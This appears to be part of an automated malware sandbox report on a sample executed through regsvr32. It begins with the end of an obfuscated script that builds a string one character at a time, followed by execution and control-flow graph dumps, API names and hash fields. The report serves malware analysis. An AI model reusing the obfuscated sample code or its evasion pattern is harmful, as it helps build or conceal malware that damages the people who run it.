                                                                                            mbdnofcze = "K";
                                                                                              41
                                                                                              mbdnofcze = "t";
                                                                                                42
                                                                                                mbdnofcze = "G";
                                                                                                  43
                                                                                                  mbdnofcze = "h";
                                                                                                    44
                                                                                                    mbdnofcze = "5";
                                                                                                      45
                                                                                                      hdgtouue = "g";
                                                                                                        46
                                                                                                        mcyra = "o";
                                                                                                          47
                                                                                                          mcyra = "a";
                                                                                                            48
                                                                                                            mcyra = "b";
                                                                                                              49
                                                                                                              mcyra = "k";
                                                                                                                50
                                                                                                                mcyra = "u";
                                                                                                                  51
                                                                                                                  iqkshjqkp = "D";
                                                                                                                    52
                                                                                                                    iqkshjqkp = "Z";
                                                                                                                      53
                                                                                                                      iqkshjqkp = "y";
                                                                                                                        54
                                                                                                                        iqkshjqkp = "v";
                                                                                                                          55
                                                                                                                          jxhwrfv = ",";
                                                                                                                            56
                                                                                                                            smafnpnc = "r";
                                                                                                                              57
                                                                                                                              mqsbf = "e";
                                                                                                                                58
                                                                                                                                mqsbf = "l";
                                                                                                                                  59
                                                                                                                                  mqsbf = ".";
                                                                                                                                    60
                                                                                                                                    gbeabu = "e";
                                                                                                                                      61
                                                                                                                                      gbeabu = "s";
                                                                                                                                        62
                                                                                                                                        gbeabu = "O";
                                                                                                                                          63
                                                                                                                                          gbeabu = "E";
                                                                                                                                            64
                                                                                                                                            gbeabu = "o";
                                                                                                                                              65
                                                                                                                                              mclcpkxr = "d";
                                                                                                                                                66
                                                                                                                                                mclcpkxr = "W";
                                                                                                                                                  67
                                                                                                                                                  mclcpkxr = "K";
                                                                                                                                                    68
                                                                                                                                                    mclcpkxr = "l";
                                                                                                                                                      69
                                                                                                                                                      mclcpkxr = "q";
                                                                                                                                                        70
                                                                                                                                                        woscoo = "n";
                                                                                                                                                          71
                                                                                                                                                          woscoo = "f";
                                                                                                                                                            72
                                                                                                                                                            woscoo = "p";
                                                                                                                                                              73
                                                                                                                                                              woscoo = "s";
                                                                                                                                                                74
                                                                                                                                                                woscoo = "y";
                                                                                                                                                                  75
                                                                                                                                                                  cvppu = "d";
                                                                                                                                                                    76
                                                                                                                                                                    cvppu = "j";
                                                                                                                                                                      77
                                                                                                                                                                      cvppu = "z";
                                                                                                                                                                        78
                                                                                                                                                                        cvppu = "\\";
                                                                                                                                                                          79
                                                                                                                                                                          dtapbpy = "k";
                                                                                                                                                                            80
                                                                                                                                                                            dtapbpy = "M";
                                                                                                                                                                              81
                                                                                                                                                                              dtapbpy = "Z";
                                                                                                                                                                                82
                                                                                                                                                                                dtapbpy = "l";
                                                                                                                                                                                  83
                                                                                                                                                                                  dtapbpy = "S";
                                                                                                                                                                                    84
                                                                                                                                                                                    qovxi = "N";
                                                                                                                                                                                      85
                                                                                                                                                                                      qovxi = "z";
                                                                                                                                                                                        86
                                                                                                                                                                                        qovxi = "T";
                                                                                                                                                                                          87
                                                                                                                                                                                          qovxi = "I";
                                                                                                                                                                                            88
                                                                                                                                                                                            qovxi = "&";
                                                                                                                                                                                              89
                                                                                                                                                                                              yzkeee = "(";
                                                                                                                                                                                                90
                                                                                                                                                                                                osbypk = "G";
                                                                                                                                                                                                  91
                                                                                                                                                                                                  osbypk = "O";
                                                                                                                                                                                                    92
                                                                                                                                                                                                    acrinokm = "P";
                                                                                                                                                                                                      93
                                                                                                                                                                                                      acrinokm = "J";
                                                                                                                                                                                                        94
                                                                                                                                                                                                        acrinokm = "j";
                                                                                                                                                                                                          95
                                                                                                                                                                                                          acrinokm = "q";
                                                                                                                                                                                                            96
                                                                                                                                                                                                            acrinokm = "+";
                                                                                                                                                                                                              97
                                                                                                                                                                                                              eoztg = "h";
                                                                                                                                                                                                                98
                                                                                                                                                                                                                huvqwire = "o";
                                                                                                                                                                                                                  99
                                                                                                                                                                                                                  huvqwire = "A";
                                                                                                                                                                                                                    100
                                                                                                                                                                                                                    huvqwire = "B";
                                                                                                                                                                                                                      101
                                                                                                                                                                                                                      huvqwire = "/";
                                                                                                                                                                                                                        102
                                                                                                                                                                                                                        ltctg = "t";
                                                                                                                                                                                                                          103
                                                                                                                                                                                                                          ltctg = "o";
                                                                                                                                                                                                                            104
                                                                                                                                                                                                                            ltctg = "R";
                                                                                                                                                                                                                              105
                                                                                                                                                                                                                              ltctg = "0";
                                                                                                                                                                                                                                106
                                                                                                                                                                                                                                mwncmi = "l";
                                                                                                                                                                                                                                  107
                                                                                                                                                                                                                                  mwncmi = "T";
                                                                                                                                                                                                                                    108
                                                                                                                                                                                                                                    mwncmi = "l";
                                                                                                                                                                                                                                      109
                                                                                                                                                                                                                                      oindqeulx = "i";
                                                                                                                                                                                                                                        110
                                                                                                                                                                                                                                        oindqeulx = "L";
                                                                                                                                                                                                                                          111
                                                                                                                                                                                                                                          oindqeulx = "X";
                                                                                                                                                                                                                                            112
                                                                                                                                                                                                                                            oindqeulx = "R";
                                                                                                                                                                                                                                              113
                                                                                                                                                                                                                                              oindqeulx = "j";
                                                                                                                                                                                                                                                114
                                                                                                                                                                                                                                                jvaxx = "H";
                                                                                                                                                                                                                                                  115
jvaxx = "s";
116 ofjnsbxia = "K";
117 ofjnsbxia = "c";
118 jqskgadc = "b";
119 jqskgadc = "F";
120 jqskgadc = "P";
121 jqskgadc = "i";
122 rbiylx = "L";
123 rbiylx = "9";
124 qtwic = "d";
125 qtwic = "i";
126 qtwic = "d";
127 yptqmnxq = "m";
128 hfgkhke = "e";
129 simxjum = "2";
130 xcdnmmue = "8";
131 bixuqcaf = "C";
132 gebyyu = "Q";
133 gebyyu = "t";
134 zsthedrh = "k";
135 acrmleeem = "z";
136 acrmleeem = "N";
137 acrmleeem = " ";
138 ftewq ( );
    • ftewq() ➔ undefined

Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 6.1%
Total number of Nodes: 849
Total number of Limit Nodes: 4
8509 24f86b3 _invalid_parameter_noinfo __free_lconv_num 8506->8509 8508 24f0c08 ExitProcess 8507->8508 8507->8509 8510 24f86eb 8508->8510 8509->8505 8511 24f5028 ExitProcess 8510->8511 8512 24f86fd 8511->8512 8514 24f8d7c 8512->8514 8515 24f8da8 8514->8515 8517 24f8d90 _invalid_parameter_noinfo 8514->8517 8515->8517 8518 24f8e40 8515->8518 8517->8509 8519 24f8e5c 8518->8519 8521 24f8e91 8519->8521 8522 24f8cac 8519->8522 8521->8517 8523 24f33dc ExitProcess 8522->8523 8525 24f8cc8 8523->8525 8524 24f8d0b 8527 24f33dc ExitProcess 8524->8527 8530 24f8cce 8524->8530 8525->8524 8526 24f33dc ExitProcess 8525->8526 8525->8530 8528 24f8cfe 8526->8528 8527->8530 8529 24f33dc ExitProcess 8528->8529 8529->8524 8530->8521 8322 24f2aaa 8323 24f2ab3 8322->8323 8325 24f2ac5 __free_lconv_num 8322->8325 8324 24f3154 ExitProcess 8323->8324 8324->8325 8326 24f82a8 8327 24f82b0 8326->8327 8328 24f33dc ExitProcess 8327->8328 8329 24f82d7 8328->8329 8330 24faaa6 8331 24f14fc __CxxCallCatchBlock ExitProcess 8330->8331 8332 24faab9 8331->8332 8337 24ecde8 __CxxCallCatchBlock ExitProcess 8332->8337 8338 24faaf8 __CxxCallCatchBlock 8332->8338 8333 24ee560 _CreateFrameInfo ExitProcess 8334 24fab0c 8333->8334 8335 24ee560 _CreateFrameInfo ExitProcess 8334->8335 8336 24fab1c 8335->8336 8337->8338 8338->8333 8531 24fa7a6 8532 24fa829 8531->8532 8533 24fa7be 8531->8533 8533->8532 8534 24ee560 _CreateFrameInfo ExitProcess 8533->8534 8535 24fa80b 8534->8535 8536 24ee560 _CreateFrameInfo ExitProcess 8535->8536 8537 24fa820 8536->8537 8538 24ee300 __GSHandlerCheck_EH ExitProcess 8537->8538 8538->8532 8153 24ec2ff 8156 24ed188 8153->8156 8157 24ed2a8 __FrameHandler3::FrameUnwindToEmptyState 8156->8157 8158 24ec313 8157->8158 8159 24ed274 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8157->8159 8160 24ed36c 8159->8160 8539 24ef3bc 8540 24ef3cc Concurrency::details::SchedulerProxy::DeleteThis 8539->8540 8545 24f3608 8540->8545 8542 24ef3d5 8544 24ef3de 
Concurrency::details::SchedulerProxy::DeleteThis 8542->8544 8549 24ef438 8542->8549 8546 24f3627 _set_fmode 8545->8546 8547 24f3638 Concurrency::details::SchedulerProxy::DeleteThis 8545->8547 8548 24f0344 _invalid_parameter_noinfo ExitProcess 8546->8548 8547->8542 8548->8547 8550 24ef45e 8549->8550 8551 24f3608 ExitProcess 8550->8551 8552 24ef496 8550->8552 8551->8552 8552->8544 8457 24eddfd 8458 24ede04 8457->8458 8459 24ef678 ExitProcess 8458->8459 8460 24ede19 __free_lconv_num 8458->8460 8461 24ede22 8459->8461 8461->8460 8462 24edf38 ExitProcess 8461->8462 8462->8460 7827 24faa79 7830 24f640c 7827->7830 7831 24f6473 7830->7831 7832 24f6426 7830->7832 7832->7831 7834 24ee560 7832->7834 7835 24ee569 _CreateFrameInfo 7834->7835 7836 24ee56e 7835->7836 7837 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 7835->7837 7836->7831 7838 24ee578 7837->7838 8359 24fa979 8360 24ee560 _CreateFrameInfo ExitProcess 8359->8360 8361 24fa993 8360->8361 8362 24ee560 _CreateFrameInfo ExitProcess 8361->8362 8363 24fa9ae 8362->8363 8364 24ee560 _CreateFrameInfo ExitProcess 8363->8364 8365 24fa9c2 8364->8365 8370 24f6608 8365->8370 8368 24ee560 _CreateFrameInfo ExitProcess 8369 24faa04 8368->8369 8371 24f6a10 __except_validate_context_record 8370->8371 8372 24ee560 _CreateFrameInfo ExitProcess 8371->8372 8373 24f6a42 8372->8373 8375 24f6b2a 8373->8375 8377 24f6a9c 8373->8377 8391 24f6af0 8373->8391 8374 24f6b98 8376 24f6c48 __GSHandlerCheck_EH ExitProcess 8374->8376 8374->8391 8379 24f1468 Is_bad_exception_allowed ExitProcess 8375->8379 8385 24f6b49 8375->8385 8376->8391 8378 24f6b17 8377->8378 8380 24f6abe 8377->8380 8381 24f6af5 8377->8381 8377->8391 8382 24f10fc __FrameHandler3::FrameUnwindToEmptyState 2 API calls 8378->8382 8379->8385 8383 24f5de0 __GSHandlerCheck_EH ExitProcess 8380->8383 8381->8378 8384 24f6acd 8381->8384 8382->8391 8383->8384 8386 24f6c41 8384->8386 8389 24f6adf 8384->8389 8385->8374 8387 24f1494 __GSHandlerCheck_EH ExitProcess 8385->8387 
8385->8391 8388 24ee49c __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8386->8388 8387->8374 8390 24f6c46 8388->8390 8392 24f5ee4 __FrameHandler3::FrameUnwindToEmptyState 2 API calls 8389->8392 8391->8368 8392->8391 8553 24ec1b8 8554 24ec1c1 _set_fmode 8553->8554 8555 24f0344 _invalid_parameter_noinfo ExitProcess 8554->8555 8556 24ee2c9 8554->8556 8555->8556 7839 24f5478 7840 24f54fd 7839->7840 7844 24f5514 __GSHandlerCheck_EH 7840->7844 7845 24f3ae0 7840->7845 7842 24f7ef8 ExitProcess 7842->7844 7843 24f5840 _log10_special 7844->7842 7844->7843 7846 24f05dc _invalid_parameter_noinfo ExitProcess 7845->7846 7847 24f3af7 7846->7847 7852 24f4e80 7847->7852 7853 24f4e99 7852->7853 7855 24f3b1f 7852->7855 7854 24f22c8 ExitProcess 7853->7854 7853->7855 7854->7855 7856 24f4eb8 7855->7856 7857 24f3b2f 7856->7857 7858 24f4ed1 7856->7858 7857->7844 7858->7857 7859 24ef65c ExitProcess 7858->7859 7859->7857 8393 24f5d78 8394 24f5d81 _set_fmode 8393->8394 8395 24f5d8e _set_fmode 8393->8395 8395->8394 8396 24f0344 _invalid_parameter_noinfo ExitProcess 8395->8396 8396->8394 8339 24ec8b4 8340 24ec8cc 8339->8340 8341 24ec8e8 8339->8341 8340->8341 8348 24ece18 8340->8348 8346 24ee300 __GSHandlerCheck_EH ExitProcess 8347 24ec90e 8346->8347 8349 24ee560 _CreateFrameInfo ExitProcess 8348->8349 8350 24ec8fa 8349->8350 8351 24ece2c 8350->8351 8352 24ee560 _CreateFrameInfo ExitProcess 8351->8352 8353 24ec906 8352->8353 8353->8346 8161 24ec0f0 8162 24ec100 8161->8162 8173 24ee268 8162->8173 8164 24ec10c _RTC_Initialize 8167 24ec187 8164->8167 8177 24ec35c 8164->8177 8166 24ec139 8180 24ed58c 8166->8180 8169 24ec145 8169->8167 8195 24ed480 8169->8195 8171 24ec179 8171->8167 8200 24eddb8 8171->8200 8174 24ee279 _set_fmode 8173->8174 8175 24ee281 8174->8175 8176 24f0344 _invalid_parameter_noinfo ExitProcess 8174->8176 8175->8164 8176->8175 8206 24ec374 8177->8206 8179 24ec365 8179->8166 8181 24ed5ac 8180->8181 8192 24ed5c3 _set_fmode __free_lconv_num 8180->8192 8182 24ed5ca 8181->8182 
8183 24ed5b4 _set_fmode 8181->8183 8184 24ef678 ExitProcess 8182->8184 8186 24f0344 _invalid_parameter_noinfo ExitProcess 8183->8186 8185 24ed5cf 8184->8185 8232 24f2e8c 8185->8232 8186->8192 8188 24ed5e6 8236 24ed774 8188->8236 8190 24ed623 8191 24ed774 ExitProcess 8190->8191 8190->8192 8193 24ed675 8191->8193 8192->8169 8193->8192 8242 24f2450 8193->8242 8196 24eed44 __FrameHandler3::FrameUnwindToEmptyState ExitProcess 8195->8196 8198 24ed48d _set_fmode 8196->8198 8197 24ed4c1 8197->8171 8198->8197 8199 24f0344 _invalid_parameter_noinfo ExitProcess 8198->8199 8199->8197 8201 24ede04 8200->8201 8202 24ef678 ExitProcess 8201->8202 8205 24ede19 __free_lconv_num 8201->8205 8203 24ede22 8202->8203 8203->8205 8307 24edf38 8203->8307 8205->8167 8207 24ec38e 8206->8207 8209 24ec387 8206->8209 8210 24ed964 8207->8210 8209->8179 8213 24edcd0 8210->8213 8212 24ed9a6 8212->8209 8214 24edcec Concurrency::details::SchedulerProxy::DeleteThis 8213->8214 8217 24eda00 8214->8217 8216 24edcf5 Concurrency::details::SchedulerProxy::DeleteThis 8216->8212 8218 24eda2c 8217->8218 8222 24edab7 __free_lconv_num 8217->8222 8221 24eda93 __free_lconv_num 8218->8221 8218->8222 8223 24f3154 8218->8223 8219 24f3154 ExitProcess 8219->8222 8221->8219 8221->8222 8222->8216 8224 24f3176 8223->8224 8226 24f3184 _set_fmode __scrt_get_show_window_mode 8224->8226 8227 24f7eb4 8224->8227 8226->8221 8228 24f7ebd _set_fmode 8227->8228 8229 24f7ed6 8227->8229 8230 24f0344 _invalid_parameter_noinfo ExitProcess 8228->8230 8231 24f7ecd 8230->8231 8231->8226 8233 24f2ecd 8232->8233 8234 24ef6d8 ExitProcess 8233->8234 8235 24f2ed1 _log10_special 8233->8235 8234->8235 8235->8188 8238 24ed7b2 8236->8238 8237 24f30cc ExitProcess 8237->8238 8238->8237 8240 24ed81e 8238->8240 8239 24ed90f 8239->8190 8240->8239 8241 24f30cc ExitProcess 8240->8241 8241->8240 8243 24f2458 8242->8243 8244 24f247d _set_fmode 8243->8244 8246 24f2494 8243->8246 8245 24f0344 _invalid_parameter_noinfo ExitProcess 8244->8245 8251 24f248d 
_invalid_parameter_noinfo __free_lconv_num 8245->8251 8247 24f254c 8246->8247 8246->8251 8252 24f29a4 8246->8252 8275 24f2b28 8246->8275 8247->8251 8292 24f78c0 8247->8292 8251->8192 8254 24f29d2 _set_fmode 8252->8254 8253 24f29ee 8253->8246 8254->8253 8255 24f2a36 8254->8255 8256 24f78c0 ExitProcess 8254->8256 8257 24f78c0 ExitProcess 8255->8257 8261 24f2a53 _invalid_parameter_noinfo 8255->8261 8256->8255 8257->8261 8258 24f2a5b _set_fmode __free_lconv_num 8258->8246 8259 24f2b8a 8260 24f2bb1 8259->8260 8263 24f2b9c 8259->8263 8265 24ef6d8 ExitProcess 8260->8265 8261->8258 8261->8259 8296 24f7e18 8261->8296 8264 24f29a4 ExitProcess 8263->8264 8271 24f2bac _log10_special __free_lconv_num 8264->8271 8266 24f2c0a 8265->8266 8267 24f2ca7 8266->8267 8272 24f2cd1 __free_lconv_num 8266->8272 8268 24f29a4 ExitProcess 8267->8268 8268->8271 8269 24ef6d8 ExitProcess 8269->8272 8270 24f29a4 ExitProcess 8270->8272 8271->8246 8272->8269 8272->8270 8272->8271 8273 24f2ddf 8272->8273 8273->8271 8303 24f74b0 8273->8303 8276 24f2b8a 8275->8276 8277 24f2b68 8275->8277 8278 24f2bb1 8276->8278 8280 24f2b9c 8276->8280 8277->8276 8279 24f7e18 ExitProcess 8277->8279 8282 24ef6d8 ExitProcess 8278->8282 8279->8277 8281 24f29a4 ExitProcess 8280->8281 8288 24f2bac _log10_special __free_lconv_num 8281->8288 8283 24f2c0a 8282->8283 8284 24f2ca7 8283->8284 8289 24f2cd1 __free_lconv_num 8283->8289 8285 24f29a4 ExitProcess 8284->8285 8285->8288 8286 24ef6d8 ExitProcess 8286->8289 8287 24f29a4 ExitProcess 8287->8289 8288->8246 8289->8286 8289->8287 8289->8288 8290 24f2ddf 8289->8290 8290->8288 8291 24f74b0 ExitProcess 8290->8291 8291->8288 8295 24f78dd _set_fmode 8292->8295 8293 24f0344 _invalid_parameter_noinfo ExitProcess 8294 24f78f8 8293->8294 8294->8247 8295->8293 8295->8294 8297 24f7e20 8296->8297 8298 24f7e35 _set_fmode 8297->8298 8299 24f7e4e 8297->8299 8300 24f0344 _invalid_parameter_noinfo ExitProcess 8298->8300 8301 24ef6d8 ExitProcess 8299->8301 8302 24f7e45 8299->8302 8300->8302 
8301->8302 8302->8261 8304 24f74dd _set_fmode 8303->8304 8305 24f0344 _invalid_parameter_noinfo ExitProcess 8304->8305 8306 24f74f2 _log10_special 8304->8306 8305->8306 8306->8271 8308 24edf5d _set_fmode __free_lconv_num 8307->8308 8310 24edf9b _invalid_parameter_noinfo __free_lconv_num 8308->8310 8311 24ee688 8308->8311 8310->8205 8312 24ee695 _set_fmode 8311->8312 8313 24ee6b2 8312->8313 8314 24f0344 _invalid_parameter_noinfo ExitProcess 8312->8314 8313->8308 8314->8313

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateInfoLocaleThread
                                                                                                                                                                                                                                                                                                  • String ID: 5
                                                                                                                                                                                                                                                                                                  • API String ID: 899703944-2226203566
                                                                                                                                                                                                                                                                                                  • Opcode ID: ac61b2cba66e79233cc380a49c31ec76b5bea808db43e292b3db5bd03ea4f0b3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 07de5a95b22e99ddf12f0ac8f23b6b991b9615b00c88138f4ca53e6b699895cf
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ac61b2cba66e79233cc380a49c31ec76b5bea808db43e292b3db5bd03ea4f0b3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F13D46BBA55140BBB0C887A99A33E773C7D3E6719E29F13D89C3C3543DCAA480B0585

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 85 24bbdb0-24bc567 86 24bc56d-24bc572 85->86 87 24bc790-24bc827 85->87 86->87 88 24bc578-24bc78e 86->88 89 24bc829-24bc82d 87->89 90 24bc833-24bcdfe MessageBoxA 87->90 88->87 89->90 91 24bce0a-24bce22 89->91 92 24bce00-24bce08 90->92 93 24bce27-24bce37 90->93 91->90 92->91 92->93
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2030045667-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 60d6a659b960b3717680036fba42c66b31b789c7868b512b370437a3548f9c93
                                                                                                                                                                                                                                                                                                  • Instruction ID: 450f7ebb50b326cb22564a607e9951eb97fa944abc5045b1463df25a7ac55797
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60d6a659b960b3717680036fba42c66b31b789c7868b512b370437a3548f9c93
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CE92B46BBF55000BAB0C88B699A73F363C7D3A6719F29B43D45D7C3152ECAE884B0585

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 96 24ed274-24ed283 call 24ed250 99 24ed296-24ed2cb call 24ed1e0 ExitProcess 96->99 100 24ed285-24ed28e 96->100 105 24ed2cd-24ed2d8 99->105 106 24ed317-24ed358 call 24ed43c 99->106 100->99 105->106 112 24ed2da-24ed2e2 105->112 110 24ed35a-24ed364 106->110 111 24ed365-24ed367 call 24ed274 106->111 116 24ed36c-24ed36f 111->116 112->106 114 24ed2e4-24ed2f1 112->114 114->106 115 24ed2f3-24ed2fc 114->115 115->106 117 24ed2fe-24ed305 115->117 117->106 118 24ed307-24ed30e 117->118 118->106 119 24ed310-24ed312 call 24ed1e0 118->119 119->106
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,?,?,?,?,00000004,024ED36C), ref: 024ED29F
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: 83775a422325cb061dd29d8490b154c16ce4811a866643c6ee45823764a3e1be
• Instruction ID: d3b5ce37c2283417ef9ae2db9cb35a03cacf932d78e0636fc4e0f3e6db1d0cb4
• Opcode Fuzzy Hash: 83775a422325cb061dd29d8490b154c16ce4811a866643c6ee45823764a3e1be
• Instruction Fuzzy Hash: 22312D7090060DCBEF54EFA488846EE77B9FB58306F04463ED41AD7251EB75C584CB91

Control-flow Graph (rendered graph omitted; summary only): function entry at 24e6f30, basic blocks 968-996 covering 24e6f30-24ea902, no calls to other subroutines. The Executed / Not Executed block colouring of the original graph is not preserved here.
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: vyTn
• API String ID: 0-1089316748
• Opcode ID: ac73c6055c85f12ac252a6679bea8b96955aaa643fb23d62653498d36e1fd4e8
• Instruction ID: 83b7360607afc321c300968fc2e4c6f4e59b82d3c160ac2c9268e70e23e3c234
• Opcode Fuzzy Hash: ac73c6055c85f12ac252a6679bea8b96955aaa643fb23d62653498d36e1fd4e8
• Instruction Fuzzy Hash: FC73925BBB55100BBB0C887A99A33E323C3D3A6729F29B63D85E3C36D3D85E480B5545
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
Yara matches
Similarity
• API ID: _clrfp
• String ID:
• API String ID: 3618594692-0
• Opcode ID: 0825bef10224c9187826c5c0cc1e92805fa228d677d99d5450349513bd5de2ce
• Instruction ID: 9de0d71a32698c69254166483fc50fffb0cc855f1a24a6c5a74e1e95ab84010b
• Opcode Fuzzy Hash: 0825bef10224c9187826c5c0cc1e92805fa228d677d99d5450349513bd5de2ce
• Instruction Fuzzy Hash: 6BB14731510B4D8FDB99CF1CC88AB6677E0FF89318F19859AE959CB262C335D892CB01
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID: vyTn
• API String ID: 0-1089316748
• Opcode ID: fee1ff493de0a62dfbd6c4a6402f45fc275154e1010e7b9f75b7645ba25e9ffc
• Instruction ID: 0e0587af37ce7e08b7861c1961ff22cf77f3e75db3784ac7eb17134d30e5b0aa
• Opcode Fuzzy Hash: fee1ff493de0a62dfbd6c4a6402f45fc275154e1010e7b9f75b7645ba25e9ffc
• Instruction Fuzzy Hash: 20C1399BBB8A040B6B0C98BA9C973F726C3D3E5709B1DF13D4997D7246ECAD884B1144
Memory Dump Source
• Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c16bb679460c2f365bd65fc238876c35270d3ccb8e22677241c934e6b682caf3
• Instruction ID: 01c0d64119c488a2a7bc4cbbb649606a4a13cf9d0acb045f7f12e45478e663b3
• Opcode Fuzzy Hash: c16bb679460c2f365bd65fc238876c35270d3ccb8e22677241c934e6b682caf3
• Instruction Fuzzy Hash: EBB12A30618F484FDB69DF3C988567E77E2FBC4710F54465FD986C3295DBA098428B82
Memory Dump Source
• Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
Yara matches
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: ae3c69de23f64a5eb9535b7f532c30bd7227b1e0e72a963f417f84bb1cc622e0
• Instruction ID: 0bfe303e5853c5a77ae8603532c4a43b67a3ff71372ab3af40070a24e057f82d
• Opcode Fuzzy Hash: ae3c69de23f64a5eb9535b7f532c30bd7227b1e0e72a963f417f84bb1cc622e0
• Instruction Fuzzy Hash: AC91F63061CF4C4FD7A8EF3D984927AB7D2FBC5710F50465FD99AC3251EAA098428B82
Memory Dump Source
• Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4f629496b896a9729be065d4d22f8e3c8e85d13c0d28e00766ea6a5fa37adc5c
• Instruction ID: e7a2b75eb07dbe612bac1303fb9338f0d3115e421c7ac6d29df94913575e8caf
• Opcode Fuzzy Hash: 4f629496b896a9729be065d4d22f8e3c8e85d13c0d28e00766ea6a5fa37adc5c
• Instruction Fuzzy Hash: E251E232718E088F9B5CDF6CD49867573D2E7EC311315822EE40AD7265DA70E9468785

Control-flow Graph (rendered graph omitted; summary only): function entry at 24f6c48, basic blocks 499-608 covering 24f6c48-24f7117. Subroutines called from this function, as recorded in the graph: 24f6070, 24ee49c, 24ee560, 24f2430, 24f71ec, 24f1334, 24f1468, 24f10d0, 24f14a8, 24ee300, 24f1494, 24f6610, 24f6490, 24f1160, 24f1230, 24f7118, 24f6580, 24ecd68, 24f639c, 24f88f8. The Executed / Not Executed block colouring of the original graph is not preserved here.
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 024F6CA4
                                                                                                                                                                                                                                                                                                    • Part of subcall function 024F6070: __GetUnwindTryBlock.LIBCMT ref: 024F60B3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 024F6070: __SetUnwindTryBlock.LIBVCRUNTIME ref: 024F60D8
                                                                                                                                                                                                                                                                                                  • Is_bad_exception_allowed.LIBVCRUNTIME ref: 024F6D7C
                                                                                                                                                                                                                                                                                                  • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 024F6FCB
                                                                                                                                                                                                                                                                                                  • std::bad_alloc::bad_alloc.LIBCMT ref: 024F70D7
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
